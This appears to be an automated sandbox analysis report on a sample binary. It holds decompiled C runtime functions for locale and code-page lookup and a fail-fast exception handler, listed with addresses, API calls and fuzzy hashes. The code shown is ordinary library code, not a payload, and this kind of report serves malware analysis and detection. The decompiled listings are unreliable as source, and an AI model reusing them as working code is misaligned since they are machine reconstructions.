Opcode Fuzzy Hash: 54b11f192b1e0f7778168d2feadeca19cf9fe16b2faa307e03c236dba0c997e1
Instruction Fuzzy Hash: EC2190B5900208BFDB00DFE4DC49BAF7778EB49305F108169FA06A72C0D7395A40CBA4

Uniqueness

Uniqueness Score: -1.00%

Function 0043691B Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 85
COMMON

Download Yara Rule

C-Code - Quality: 94%

			E0043691B(void* __ecx, signed int _a4, intOrPtr _a8) {
				char _v8;
				int _t17;
				signed int _t18;
				signed int _t23;
				signed int _t25;
				signed int _t26;
				signed int _t27;
				void* _t30;
				void* _t31;
				intOrPtr _t32;
				intOrPtr _t33;
				intOrPtr* _t36;
				intOrPtr* _t37;

				_push(__ecx);
				_t23 = _a4;
				if(_t23 == 0) {
					L21:
					_t10 =  &_v8; // 0x436c39
					if(GetLocaleInfoW( *(_a8 + 8), 0x20001004, _t10, 2) != 0) {
						_t13 =  &_v8; // 0x436c39
						_t17 =  *_t13;
						if(_t17 == 0) {
							_t17 = GetACP();
						}
						L25:
						return _t17;
					}
					L22:
					_t17 = 0;
					goto L25;
				}
				_t18 = 0;
				if( *_t23 == 0) {
					goto L21;
				}
				_t36 = L"ACP";
				_t25 = _t23;
				while(1) {
					_t30 =  *_t25;
					if(_t30 !=  *_t36) {
						break;
					}
					if(_t30 == 0) {
						L7:
						_t26 = _t18;
						L9:
						if(_t26 == 0) {
							goto L21;
						}
						_t37 = L"OCP";
						_t27 = _t23;
						while(1) {
							_t31 =  *_t27;
							if(_t31 !=  *_t37) {
								break;
							}
							if(_t31 == 0) {
								L17:
								if(_t18 != 0) {
									_t17 = E0042BC48(_t23, _t23);
									goto L25;
								}
								_t6 =  &_v8; // 0x436c39
								if(GetLocaleInfoW( *(_a8 + 8), 0x2000000b, _t6, 2) == 0) {
									goto L22;
								}
								_t9 =  &_v8; // 0x436c39
								_t17 =  *_t9;
								goto L25;
							}
							_t32 =  *((intOrPtr*)(_t27 + 2));
							if(_t32 !=  *((intOrPtr*)(_t37 + 2))) {
								break;
							}
							_t27 = _t27 + 4;
							_t37 = _t37 + 4;
							if(_t32 != 0) {
								continue;
							}
							goto L17;
						}
						asm("sbb eax, eax");
						_t18 = _t18 | 0x00000001;
						goto L17;
					}
					_t33 =  *((intOrPtr*)(_t25 + 2));
					if(_t33 !=  *((intOrPtr*)(_t36 + 2))) {
						break;
					}
					_t25 = _t25 + 4;
					_t36 = _t36 + 4;
					if(_t33 != 0) {
						continue;
					}
					goto L7;
				}
				asm("sbb edx, edx");
				_t26 = _t25 | 0x00000001;
				goto L9;
			}

0x00436920
0x00436921
0x00436928
0x004369cc
0x004369ce
0x004369e5
0x004369eb
0x004369eb
0x004369f0
0x004369f2
0x004369f2
0x004369f8
0x004369fb
0x004369fb
0x004369e7
0x004369e7
0x00000000
0x004369e7
0x0043692e
0x00436933
0x00000000
0x00000000
0x00436939
0x0043693e
0x00436940
0x00436940
0x00436946
0x00000000
0x00000000
0x0043694b
0x00436962
0x00436962
0x0043696b
0x0043696d
0x00000000
0x00000000
0x0043696f
0x00436974
0x00436976
0x00436976
0x0043697c
0x00000000
0x00000000
0x00436981
0x0043699f
0x004369a1
0x004369c4
0x00000000
0x004369c9
0x004369a5
0x004369bc
0x00000000
0x00000000
0x004369be
0x004369be
0x00000000
0x004369be
0x00436983
0x0043698b
0x00000000
0x00000000
0x0043698d
0x00436990
0x00436996
0x00000000
0x00000000
0x00000000
0x00436998
0x0043699a
0x0043699c
0x00000000
0x0043699c
0x0043694d
0x00436955
0x00000000
0x00000000
0x00436957
0x0043695a
0x00436960
0x00000000
0x00000000
0x00000000
0x00436960
0x00436966
0x00436968
0x00000000

APIs

GetLocaleInfoW.KERNEL32(?,2000000B,9lC,00000002,00000000,?,?,?,00436C39,?,00000000), ref: 004369B4
GetLocaleInfoW.KERNEL32(?,20001004,9lC,00000002,00000000,?,?,?,00436C39,?,00000000), ref: 004369DD
GetACP.KERNEL32(?,?,00436C39,?,00000000), ref: 004369F2

Strings

9lC, xrefs: 004369CE, 004369EB, 004369A5, 004369BE, 004369A8, 004369D1
OCP, xrefs: 0043696F
ACP, xrefs: 00436939

Memory Dump Source

Source File: 00000001.00000002.259619952.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.259607835.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.259672292.0000000000449000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.259798453.0000000000453000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.259806258.0000000000454000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.259814018.0000000000456000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.259821263.0000000000464000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_wcycejenv.jbxd

Similarity

API ID: InfoLocale
String ID: 9lC$ACP$OCP
API String ID: 2299586839-3729917319
Opcode ID: 5f7d57b497ebec3da74fea99ad9cbdfb4c6960eeac46febb4c9f617b6fae19bf
Instruction ID: 24ccf7442754850c00102a696fabac613867963437e1d6ddbf692645a4f67093
Opcode Fuzzy Hash: 5f7d57b497ebec3da74fea99ad9cbdfb4c6960eeac46febb4c9f617b6fae19bf
Instruction Fuzzy Hash: 6221C4B2600103B6EB348F14C905B9772A6AF5CF64F57E566E809DB204E73ADD41C358

Uniqueness

Uniqueness Score: -1.00%

Function 00436AF0 Relevance: 7.7, APIs: 5, Instructions: 183
COMMON

Download Yara Rule

C-Code - Quality: 90%

			E00436AF0(void* __ecx, void* __edx, void* __eflags, signed short _a4, short* _a8, short* _a12) {
				signed int _v8;
				int _v12;
				int _v16;
				char _v20;
				signed short* _v24;
				short* _v28;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				signed int _t39;
				void* _t45;
				signed short* _t46;
				signed short _t47;
				short* _t48;
				int _t49;
				void* _t53;
				short* _t55;
				short* _t56;
				short* _t57;
				int _t64;
				int _t66;
				short* _t70;
				intOrPtr _t73;
				void* _t75;
				short* _t76;
				intOrPtr _t83;
				short* _t86;
				short* _t89;
				short** _t99;
				short* _t100;
				signed short _t101;
				signed int _t104;
				void* _t105;

				_t39 =  *0x454264; // 0x8c4320d5
				_v8 = _t39 ^ _t104;
				_t86 = _a12;
				_t101 = _a4;
				_v28 = _a8;
				_v24 = E0042DA10(__ecx, __edx) + 0x50;
				asm("stosd");
				asm("stosd");
				asm("stosd");
				_t45 = E0042DA10(__ecx, __edx);
				_t97 = 0;
				 *((intOrPtr*)(_t45 + 0x34c)) =  &_v20;
				_t89 = _t101 + 0x80;
				_t46 = _v24;
				 *_t46 = _t101;
				_t99 =  &(_t46[2]);
				 *_t99 = _t89;
				if(_t89 != 0 &&  *_t89 != 0) {
					_t83 =  *0x44c5b4; // 0x17
					E00436A8F(_t89, 0, 0x44c4a0, _t83 - 1, _t99);
					_t46 = _v24;
					_t105 = _t105 + 0xc;
					_t97 = 0;
				}
				_v20 = _t97;
				_t47 =  *_t46;
				if(_t47 == 0 ||  *_t47 == _t97) {
					_t48 =  *_t99;
					__eflags = _t48;
					if(_t48 == 0) {
						L19:
						_v20 = 0x104;
						_t49 = GetUserDefaultLCID();
						_v12 = _t49;
						_v16 = _t49;
						goto L20;
					}
					__eflags =  *_t48 - _t97;
					if(__eflags == 0) {
						goto L19;
					}
					E00436413(_t89, _t97, __eflags,  &_v20);
					_pop(_t89);
					goto L20;
				} else {
					_t70 =  *_t99;
					if(_t70 == 0) {
						L8:
						E00436517(_t89, _t97, __eflags,  &_v20);
						L9:
						_pop(_t89);
						if(_v20 != 0) {
							_t100 = 0;
							__eflags = 0;
							L25:
							asm("sbb esi, esi");
							_t101 = E0043691B(_t89,  ~_t101 & _t101 + 0x00000100,  &_v20);
							__eflags = _t101;
							if(_t101 == 0) {
								L22:
								_t53 = 0;
								L23:
								return E004085C2(_t53, _t86, _v8 ^ _t104, _t97, _t100, _t101);
							}
							_t55 = IsValidCodePage(_t101 & 0x0000ffff);
							__eflags = _t55;
							if(_t55 == 0) {
								goto L22;
							}
							_t56 = IsValidLocale(_v16, 1);
							__eflags = _t56;
							if(_t56 == 0) {
								goto L22;
							}
							_t57 = _v28;
							__eflags = _t57;
							if(_t57 != 0) {
								 *_t57 = _t101;
							}
							E0042CE61(_v16,  &(_v24[0x128]), 0x55, _t100);
							__eflags = _t86;
							if(_t86 == 0) {
								L34:
								_t53 = 1;
								goto L23;
							}
							_t33 =  &(_t86[0x90]); // 0xd0
							E0042CE61(_v16, _t33, 0x55, _t100);
							_t64 = GetLocaleInfoW(_v16, 0x1001, _t86, 0x40);
							__eflags = _t64;
							if(_t64 == 0) {
								goto L22;
							}
							_t36 =  &(_t86[0x40]); // 0x30
							_t66 = GetLocaleInfoW(_v12, 0x1002, _t36, 0x40);
							__eflags = _t66;
							if(_t66 == 0) {
								goto L22;
							}
							_t38 =  &(_t86[0x80]); // 0xb0
							E0043E4B5(_t38, _t101, _t38, 0x10, 0xa);
							goto L34;
						}
						_t73 =  *0x44c49c; // 0x41
						_t75 = E00436A8F(_t89, _t97, 0x44c190, _t73 - 1, _v24);
						_t105 = _t105 + 0xc;
						if(_t75 == 0) {
							L20:
							_t100 = 0;
							__eflags = 0;
							L21:
							if(_v20 != 0) {
								goto L25;
							}
							goto L22;
						}
						_t76 =  *_t99;
						_t100 = 0;
						if(_t76 == 0) {
							L14:
							E00436517(_t89, _t97, __eflags,  &_v20);
							L15:
							_pop(_t89);
							goto L21;
						}
						_t118 =  *_t76;
						if( *_t76 == 0) {
							goto L14;
						}
						E0043647C(_t89, _t97, _t118,  &_v20);
						goto L15;
					}
					_t114 =  *_t70 - _t97;
					if( *_t70 == _t97) {
						goto L8;
					}
					E0043647C(_t89, _t97, _t114,  &_v20);
					goto L9;
				}
			}

0x00436af8
0x00436aff
0x00436b06
0x00436b0a
0x00436b0e
0x00436b1c
0x00436b21
0x00436b22
0x00436b23
0x00436b24
0x00436b2c
0x00436b2e
0x00436b34
0x00436b3a
0x00436b3d
0x00436b3f
0x00436b42
0x00436b46
0x00436b4d
0x00436b5a
0x00436b5f
0x00436b62
0x00436b65
0x00436b65
0x00436b67
0x00436b6a
0x00436b6e
0x00436bde
0x00436be0
0x00436be2
0x00436bf5
0x00436bf5
0x00436bfc
0x00436c02
0x00436c05
0x00000000
0x00436c05
0x00436be4
0x00436be7
0x00000000
0x00000000
0x00436bed
0x00436bf2
0x00000000
0x00436b75
0x00436b75
0x00436b79
0x00436b8b
0x00436b8f
0x00436b94
0x00436b98
0x00436b99
0x00436c21
0x00436c21
0x00436c23
0x00436c2f
0x00436c39
0x00436c3d
0x00436c3f
0x00436c10
0x00436c10
0x00436c12
0x00436c20
0x00436c20
0x00436c45
0x00436c4b
0x00436c4d
0x00000000
0x00000000
0x00436c54
0x00436c5a
0x00436c5c
0x00000000
0x00000000
0x00436c5e
0x00436c61
0x00436c63
0x00436c65
0x00436c65
0x00436c76
0x00436c7b
0x00436c7d
0x00436cdd
0x00436cdf
0x00000000
0x00436cdf
0x00436c82
0x00436c8c
0x00436c9c
0x00436ca2
0x00436ca4
0x00000000
0x00000000
0x00436cac
0x00436cbb
0x00436cc1
0x00436cc3
0x00000000
0x00000000
0x00436ccd
0x00436cd5
0x00000000
0x00436cda
0x00436b9f
0x00436bae
0x00436bb3
0x00436bb8
0x00436c08
0x00436c08
0x00436c08
0x00436c0a
0x00436c0e
0x00000000
0x00000000
0x00000000
0x00436c0e
0x00436bba
0x00436bbc
0x00436bc0
0x00436bd2
0x00436bd6
0x00436bdb
0x00436bdb
0x00000000
0x00436bdb
0x00436bc2
0x00436bc5
0x00000000
0x00000000
0x00436bcb
0x00000000
0x00436bcb
0x00436b7b
0x00436b7e
0x00000000
0x00000000
0x00436b84
0x00000000
0x00436b84

APIs

Part of subcall function 0042DA10: GetLastError.KERNEL32(?,?,?,0041338C,?,?,?,?,00416B39,?), ref: 0042DA15
Part of subcall function 0042DA10: SetLastError.KERNEL32(00000000,00000006,000000FF,?,?,0041338C,?,?,?,?,00416B39,?), ref: 0042DAB3

Part of subcall function 0042DA10: _free.LIBCMT ref: 0042DA72
Part of subcall function 0042DA10: _free.LIBCMT ref: 0042DAA8

GetUserDefaultLCID.KERNEL32(?,?,?,00000055,?), ref: 00436BFC
IsValidCodePage.KERNEL32(00000000), ref: 00436C45
IsValidLocale.KERNEL32(?,00000001), ref: 00436C54
GetLocaleInfoW.KERNEL32(?,00001001,-00000050,00000040,?,000000D0,00000055,00000000,?,?,00000055,00000000), ref: 00436C9C
GetLocaleInfoW.KERNEL32(?,00001002,00000030,00000040), ref: 00436CBB

Memory Dump Source

Source File: 00000001.00000002.259619952.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.259607835.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.259672292.0000000000449000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.259798453.0000000000453000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.259806258.0000000000454000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.259814018.0000000000456000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.259821263.0000000000464000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_wcycejenv.jbxd

Similarity

API ID: Locale$ErrorInfoLastValid_free$CodeDefaultPageUser
String ID:
API String ID: 949163717-0
Opcode ID: 621cbbcd43cf20a0d045b3037781fd4b4957eda17fba9b8b9b53acfee51c3432
Instruction ID: 7246aa3fdcd288926992daee62abb1b7d8a6cbfd7db95598eea116f66aa3af35
Opcode Fuzzy Hash: 621cbbcd43cf20a0d045b3037781fd4b4957eda17fba9b8b9b53acfee51c3432
Instruction Fuzzy Hash: 40519471A00216BFDF10DFA5CC45ABF77B8EF0C700F16946AE551EB291D77899408B68

Uniqueness

Uniqueness Score: -1.00%

Function 00436171 Relevance: 7.3, APIs: 3, Strings: 1, Instructions: 251
COMMON

Download Yara Rule

C-Code - Quality: 70%

			E00436171(void* __ecx, void* __edx, void* __eflags, intOrPtr* _a4, signed short* _a8, intOrPtr _a12) {
				intOrPtr* _v8;
				short _v12;
				signed int _v32;
				intOrPtr _v40;
				signed int _v52;
				char _v272;
				short _v292;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				void* _t33;
				short* _t34;
				intOrPtr* _t35;
				void* _t37;
				intOrPtr* _t38;
				signed short _t39;
				signed short* _t42;
				intOrPtr _t45;
				void* _t47;
				signed int _t50;
				void* _t52;
				signed int _t56;
				void* _t68;
				void* _t72;
				void* _t73;
				void* _t77;
				intOrPtr* _t84;
				short* _t86;
				void* _t88;
				intOrPtr* _t91;
				intOrPtr* _t95;
				short _t113;
				void* _t114;
				intOrPtr* _t116;
				intOrPtr _t119;
				signed int* _t120;
				void* _t121;
				intOrPtr* _t123;
				signed short _t125;
				int _t127;
				void* _t128;
				void* _t131;
				signed int _t132;

				_push(__ecx);
				_push(__ecx);
				_t84 = _a4;
				_t33 = E0042DA10(__ecx, __edx);
				_t113 = 0;
				_v12 = 0;
				_t3 = _t33 + 0x50; // 0x50
				_t123 = _t3;
				_t4 = _t123 + 0x250; // 0x2a0
				_t34 = _t4;
				 *((intOrPtr*)(_t123 + 8)) = 0;
				 *_t34 = 0;
				_t6 = _t123 + 4; // 0x54
				_t116 = _t6;
				_v8 = _t34;
				_t91 = _t84;
				_t35 = _t84 + 0x80;
				 *_t123 = _t84;
				 *_t116 = _t35;
				if( *_t35 != 0) {
					E00436104(0x44c4a0, 0x16, _t116);
					_t91 =  *_t123;
					_t131 = _t131 + 0xc;
					_t113 = 0;
				}
				_push(_t123);
				if( *_t91 == _t113) {
					E00435A2F(_t84, _t91);
					goto L12;
				} else {
					if( *((intOrPtr*)( *_t116)) == _t113) {
						E00435B4F();
					} else {
						E00435AB6(_t91);
					}
					if( *((intOrPtr*)(_t123 + 8)) == 0) {
						_t77 = E00436104(0x44c190, 0x40, _t123);
						_t131 = _t131 + 0xc;
						if(_t77 != 0) {
							_push(_t123);
							if( *((intOrPtr*)( *_t116)) == 0) {
								E00435B4F();
							} else {
								E00435AB6(0);
							}
							L12:
						}
					}
				}
				if( *((intOrPtr*)(_t123 + 8)) == 0) {
					L37:
					_t37 = 0;
					goto L38;
				} else {
					_t38 = _t84 + 0x100;
					if( *_t84 != 0 ||  *_t38 != 0) {
						_t39 = E00435F7B(_t38, _t123);
					} else {
						_t39 = GetACP();
					}
					_t125 = _t39;
					if(_t125 == 0 || _t125 == 0xfde8 || IsValidCodePage(_t125 & 0x0000ffff) == 0) {
						goto L37;
					} else {
						_t42 = _a8;
						if(_t42 != 0) {
							 *_t42 = _t125;
						}
						_t119 = _a12;
						if(_t119 == 0) {
							L36:
							_t37 = 1;
							L38:
							return _t37;
						} else {
							_t95 = _v8;
							_t15 = _t119 + 0x120; // 0xd0
							_t86 = _t15;
							 *_t86 = 0;
							_t16 = _t95 + 2; // 0x2
							_t114 = _t16;
							do {
								_t45 =  *_t95;
								_t95 = _t95 + 2;
							} while (_t45 != _v12);
							_t18 = (_t95 - _t114 >> 1) + 1; // -1
							_t47 = E00430A09(_t86, 0x55, _v8);
							_t132 = _t131 + 0x10;
							if(_t47 != 0) {
								L39:
								_push(0);
								_push(0);
								_push(0);
								_push(0);
								_push(0);
								E0042C03B();
								asm("int3");
								_t130 = _t132;
								_t50 =  *0x454264; // 0x8c4320d5
								_v52 = _t50 ^ _t132;
								_push(_t86);
								_push(_t125);
								_push(_t119);
								_t52 = E0042DA10(_t97, _t114);
								_t87 = _t52;
								_t120 =  *(E0042DA10(_t97, _t114) + 0x34c);
								_t127 = E004368CA(_v40);
								asm("sbb ecx, ecx");
								_t56 = GetLocaleInfoW(_t127, ( ~( *(_t52 + 0x64)) & 0xfffff005) + 0x1002,  &_v292, 0x78);
								if(_t56 != 0) {
									if(E0042B692(_t120, _t127,  *((intOrPtr*)(_t87 + 0x54)),  &_v272) == 0 && E004369FC(_t127) != 0) {
										 *_t120 =  *_t120 | 0x00000004;
										_t120[2] = _t127;
										_t120[1] = _t127;
									}
									_t62 =  !( *_t120 >> 2) & 0x00000001;
								} else {
									 *_t120 =  *_t120 & _t56;
									_t62 = _t56 + 1;
								}
								_pop(_t121);
								_pop(_t128);
								_pop(_t88);
								return E004085C2(_t62, _t88, _v32 ^ _t130, _t114, _t121, _t128);
							} else {
								if(E0042CC9F(_t86, 0x1001, _t119, 0x40) == 0) {
									goto L37;
								} else {
									_t20 = _t119 + 0x80; // 0x30
									_t86 = _t20;
									_t21 = _t119 + 0x120; // 0xd0
									if(E0042CC9F(_t21, 0x1002, _t86, 0x40) == 0) {
										goto L37;
									} else {
										_t68 = E004088E2(_t86, 0x5f);
										_pop(_t97);
										if(_t68 != 0) {
											L31:
											_t22 = _t119 + 0x120; // 0xd0
											if(E0042CC9F(_t22, 7, _t86, 0x40) == 0) {
												goto L37;
											} else {
												goto L32;
											}
										} else {
											_t73 = E004088E2(_t86, 0x2e);
											_pop(_t97);
											if(_t73 == 0) {
												L32:
												_t119 = _t119 + 0x100;
												if(_t125 != 0xfde9) {
													E0043E4B5(_t97, _t125, _t119, 0x10, 0xa);
													goto L36;
												} else {
													_push(5);
													_t72 = E00430A09(_t119, 0x10, L"utf8");
													_t132 = _t132 + 0x10;
													if(_t72 != 0) {
														goto L39;
													} else {
														goto L36;
													}
												}
											} else {
												goto L31;
											}
										}
									}
								}
							}
						}
					}
				}
			}

0x00436176
0x00436177
0x00436179
0x0043617e
0x00436185
0x00436187
0x0043618a
0x0043618a
0x0043618d
0x0043618d
0x00436193
0x00436196
0x00436199
0x00436199
0x0043619c
0x0043619f
0x004361a1
0x004361a7
0x004361a9
0x004361ae
0x004361b8
0x004361bd
0x004361bf
0x004361c2
0x004361c2
0x004361c4
0x004361c8
0x00436211
0x00000000
0x004361ca
0x004361cf
0x004361d8
0x004361d1
0x004361d1
0x004361d1
0x004361e3
0x004361ed
0x004361f2
0x004361f7
0x004361fd
0x00436201
0x0043620a
0x00436203
0x00436203
0x00436203
0x00436216
0x00436216
0x004361f7
0x004361e3
0x0043621c
0x00436358
0x00436358
0x00000000
0x00436222
0x00436222
0x0043622b
0x0043623c
0x00436232
0x00436232
0x00436232
0x00436243
0x00436247
0x00000000
0x0043626b
0x0043626b
0x00436270
0x00436272
0x00436272
0x00436274
0x00436279
0x00436353
0x00436355
0x0043635a
0x0043635e
0x0043627f
0x0043627f
0x00436282
0x00436282
0x0043628a
0x0043628d
0x0043628d
0x00436290
0x00436290
0x00436293
0x00436296
0x004362a0
0x004362aa
0x004362af
0x004362b4
0x0043635f
0x00436361
0x00436362
0x00436363
0x00436364
0x00436365
0x00436366
0x0043636b
0x0043636f
0x00436377
0x0043637e
0x00436381
0x00436382
0x00436386
0x00436387
0x0043638c
0x00436394
0x004363a3
0x004363af
0x004363c0
0x004363c8
0x004363e2
0x004363ef
0x004363f2
0x004363f5
0x004363f5
0x004363ff
0x004363ca
0x004363ca
0x004363cc
0x004363cc
0x00436405
0x00436406
0x00436409
0x00436410
0x004362ba
0x004362ca
0x00000000
0x004362d0
0x004362d2
0x004362d2
0x004362de
0x004362ec
0x00000000
0x004362ee
0x004362f1
0x004362f7
0x004362fa
0x0043630a
0x0043630f
0x0043631d
0x00000000
0x00000000
0x00000000
0x00000000
0x004362fc
0x004362ff
0x00436305
0x00436308
0x0043631f
0x0043631f
0x0043632b
0x0043634b
0x00000000
0x0043632d
0x0043632d
0x00436337
0x0043633c
0x00436341
0x00000000
0x00436343
0x00000000
0x00436343
0x00436341
0x00000000
0x00000000
0x00000000
0x00436308
0x004362fa
0x004362ec
0x004362ca
0x004362b4
0x00436279
0x00436247

APIs

Part of subcall function 0042DA10: GetLastError.KERNEL32(?,?,?,0041338C,?,?,?,?,00416B39,?), ref: 0042DA15
Part of subcall function 0042DA10: SetLastError.KERNEL32(00000000,00000006,000000FF,?,?,0041338C,?,?,?,?,00416B39,?), ref: 0042DAB3

GetACP.KERNEL32(?,?,?,?,?,?,00429B63,?,?,?,00000055,?,-00000050,?,?,00000000), ref: 00436232
IsValidCodePage.KERNEL32(00000000,?,?,?,?,?,?,00429B63,?,?,?,00000055,?,-00000050,?,?), ref: 0043625D
GetLocaleInfoW.KERNEL32(00000000,?,?,00000078,-00000050,00000000,000000D0), ref: 004363C0

Strings

utf8, xrefs: 0043632F

Memory Dump Source

Source File: 00000001.00000002.259619952.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.259607835.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.259672292.0000000000449000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.259798453.0000000000453000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.259806258.0000000000454000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.259814018.0000000000456000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.259821263.0000000000464000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_wcycejenv.jbxd

Similarity

API ID: ErrorLast$CodeInfoLocalePageValid
String ID: utf8
API String ID: 607553120-905460609
Opcode ID: b2c457e58ecdfdccbbaa6f95845660be2808273171187fb4efadc3ab4c4197fb
Instruction ID: 6967982c26edce5fdd7dca25918d4a0a377f70af06ae9277e1b7ce7253d89d28
Opcode Fuzzy Hash: b2c457e58ecdfdccbbaa6f95845660be2808273171187fb4efadc3ab4c4197fb
Instruction Fuzzy Hash: BB710871600317BADB24AB65CC46BBB73A8EF4D304F16906FF90597281EA7CE9018669

Uniqueness

Uniqueness Score: -1.00%

Function 00407F97 Relevance: 6.1, APIs: 4, Instructions: 73
COMMON

Download Yara Rule

C-Code - Quality: 85%

			E00407F97(intOrPtr __edx, intOrPtr __edi, intOrPtr __esi, intOrPtr _a4) {
				char _v0;
				struct _EXCEPTION_POINTERS _v12;
				intOrPtr _v80;
				intOrPtr _v88;
				char _v92;
				intOrPtr _v608;
				intOrPtr _v612;
				void* _v616;
				intOrPtr _v620;
				char _v624;
				intOrPtr _v628;
				intOrPtr _v632;
				intOrPtr _v636;
				intOrPtr _v640;
				intOrPtr _v644;
				intOrPtr _v648;
				intOrPtr _v652;
				intOrPtr _v656;
				intOrPtr _v660;
				intOrPtr _v664;
				intOrPtr _v668;
				char _v808;
				char* _t39;
				long _t49;
				intOrPtr _t51;
				void* _t54;
				intOrPtr _t55;
				intOrPtr _t57;
				intOrPtr _t58;
				intOrPtr _t59;
				intOrPtr* _t60;

				_t59 = __esi;
				_t58 = __edi;
				_t57 = __edx;
				if(IsProcessorFeaturePresent(0x17) != 0) {
					_t55 = _a4;
					asm("int 0x29");
				}
				E00408192(_t34);
				 *_t60 = 0x2cc;
				_v632 = E004097A0(_t58,  &_v808, 0, 3);
				_v636 = _t55;
				_v640 = _t57;
				_v644 = _t51;
				_v648 = _t59;
				_v652 = _t58;
				_v608 = ss;
				_v620 = cs;
				_v656 = ds;
				_v660 = es;
				_v664 = fs;
				_v668 = gs;
				asm("pushfd");
				_pop( *_t15);
				_v624 = _v0;
				_t39 =  &_v0;
				_v612 = _t39;
				_v808 = 0x10001;
				_v628 =  *((intOrPtr*)(_t39 - 4));
				E004097A0(_t58,  &_v92, 0, 0x50);
				_v92 = 0x40000015;
				_v88 = 1;
				_v80 = _v0;
				_t28 = IsDebuggerPresent() - 1; // -1
				_v12.ExceptionRecord =  &_v92;
				asm("sbb bl, bl");
				_v12.ContextRecord =  &_v808;
				_t54 =  ~_t28 + 1;
				SetUnhandledExceptionFilter(0);
				_t49 = UnhandledExceptionFilter( &_v12);
				if(_t49 == 0 && _t54 == 0) {
					_push(3);
					return E00408192(_t49);
				}
				return _t49;
			}

0x00407f97
0x00407f97
0x00407f97
0x00407fab
0x00407fad
0x00407fb0
0x00407fb0
0x00407fb4
0x00407fb9
0x00407fd1
0x00407fd7
0x00407fdd
0x00407fe3
0x00407fe9
0x00407fef
0x00407ff5
0x00407ffc
0x00408003
0x0040800a
0x00408011
0x00408018
0x0040801f
0x00408020
0x00408029
0x0040802f
0x00408032
0x00408038
0x00408047
0x00408053
0x0040805e
0x00408065
0x0040806c
0x00408077
0x0040807f
0x00408088
0x0040808a
0x0040808d
0x0040808f
0x00408099
0x004080a1
0x004080a7
0x00000000
0x004080ae
0x004080b1

APIs

IsProcessorFeaturePresent.KERNEL32(00000017), ref: 00407FA3
IsDebuggerPresent.KERNEL32 ref: 0040806F
SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 0040808F
UnhandledExceptionFilter.KERNEL32(?), ref: 00408099

Memory Dump Source

Source File: 00000001.00000002.259619952.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.259607835.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.259672292.0000000000449000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.259798453.0000000000453000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.259806258.0000000000454000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.259814018.0000000000456000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.259821263.0000000000464000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_wcycejenv.jbxd

Similarity

API ID: ExceptionFilterPresentUnhandled$DebuggerFeatureProcessor
String ID:
API String ID: 254469556-0
Opcode ID: 99b104eca97b8f250e1bbd3343f64444e3efd2959d7c6fb71c39118c1730a791
Instruction ID: 63a2bb19abbcb14630a77c10b6f0f7768b9ac01b6c4f42ab3fe880f24842f471
Opcode Fuzzy Hash: 99b104eca97b8f250e1bbd3343f64444e3efd2959d7c6fb71c39118c1730a791
Instruction Fuzzy Hash: AE312B75D05219DBEB20DF65D9497CDBBF8BF08304F1040AAE44CAB290EB755A85CF49

Uniqueness

Uniqueness Score: -1.00%

Function 004365A2 Relevance: 4.7, APIs: 3, Instructions: 205
COMMON

Download Yara Rule

C-Code - Quality: 92%

			E004365A2(void* __ecx, signed int __edx, void* __eflags, intOrPtr _a4) {
				signed int _v8;
				short _v248;
				signed int _v252;
				intOrPtr _v256;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				signed int _t50;
				int _t56;
				signed int _t58;
				void* _t74;
				signed int _t78;
				intOrPtr _t80;
				signed int _t81;
				void* _t89;
				signed int _t90;
				signed int _t92;
				intOrPtr _t93;
				void* _t94;
				signed int _t111;
				signed int _t115;
				intOrPtr* _t117;
				intOrPtr* _t122;
				signed int* _t124;
				int _t126;
				signed int _t127;
				void* _t128;
				void* _t141;

				_t121 = __edx;
				_t50 =  *0x454264; // 0x8c4320d5
				_v8 = _t50 ^ _t127;
				_t94 = E0042DA10(__ecx, __edx);
				_t124 =  *(E0042DA10(__ecx, __edx) + 0x34c);
				_t126 = E004368CA(_a4);
				asm("sbb ecx, ecx");
				_t56 = GetLocaleInfoW(_t126, ( ~( *(_t94 + 0x64)) & 0xfffff005) + 0x1002,  &_v248, 0x78);
				_v252 = _v252 & 0x00000000;
